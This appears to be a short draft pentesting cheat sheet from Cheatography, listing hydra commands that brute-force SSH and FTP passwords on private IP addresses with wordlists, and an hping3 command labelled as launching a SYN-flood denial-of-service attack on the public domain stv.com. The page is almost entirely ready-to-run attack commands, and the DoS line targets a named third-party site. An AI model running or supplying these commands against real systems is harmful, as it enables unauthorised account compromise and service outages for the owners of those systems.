Show Menu
Cheatography

Pentesting Cheat Sheet (DRAFT) by

All about pentesting.

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Password Cracking

hydra -l joshua -P wordli­st.txt -t 6 ssh://­192.16­8.0.29
SSH into computer brute-­for­ceing every password in wordli­st.txt
hydra -t 1 -l admin -P /usr/s­har­e/j­ohn­/pa­ssw­ord.lst -vV 192.16­8.0.24 ftp
Cracks an FTP password from a default wordlist available on Kali Linux
 

DoS Attacks

hping3 --flood -S -V --rand­-source http:/­/st­v.com
Launches a DoS Attack on stv.com